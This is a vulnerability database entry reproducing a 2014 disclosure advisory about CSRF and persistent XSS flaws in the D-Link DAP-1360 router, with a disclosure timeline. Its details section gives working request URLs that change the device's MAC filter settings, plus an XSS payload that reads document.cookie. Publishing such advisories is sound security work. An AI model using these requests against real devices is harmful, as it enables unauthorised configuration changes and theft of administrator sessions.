ID
VAR-E-201411-0438
TITLE
D-Link DAP-1360 Cross Site Scripting / Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
The D-Link DAP-1360 suffers from cross site request forgery and cross site scripting vulnerabilities.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | d link | model: | dap-1360 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Hello list!
There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
D-Link will fix these vulnerabilities in the next version of firmware (will
be released in November), as they answered me in October. But in November
they answered me, that firmware still was not publicly released due to the
bugs and they need to work on it.
I tested model DAP-1360/B/D1B. There are three models of DAP-1360:
DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes
fixes for the vulnerabilities.
----------
Details:
----------
In section Wi-Fi - MAC filter - Filter mode it's possible to change
parameter MAC filter restrict mode:
Disabled:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}
Allow:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}
Deny:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}
In section Wi-Fi - MAC filter - MAC addresses it's possible to add and
remove MAC addresses:
Add:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]
Remove:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]
XSS (persistent XSS) (WASC-08):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]
Code will execute at http://192.168.0.50/index.cgi#wifi/mac.
------------
Timeline:
------------
2014.05.22 - informed developer about multiple vulnerabilities.
2014.06.21 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.26 - disclosed at my site (http://websecurity.com.ua/7215/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
xss, csrf
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
MustLive
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 129307 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 129307 |
LAST UPDATE DATE
2022-07-27T09:58:43.515000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 129307 | date: | 2014-11-28T09:22:22 |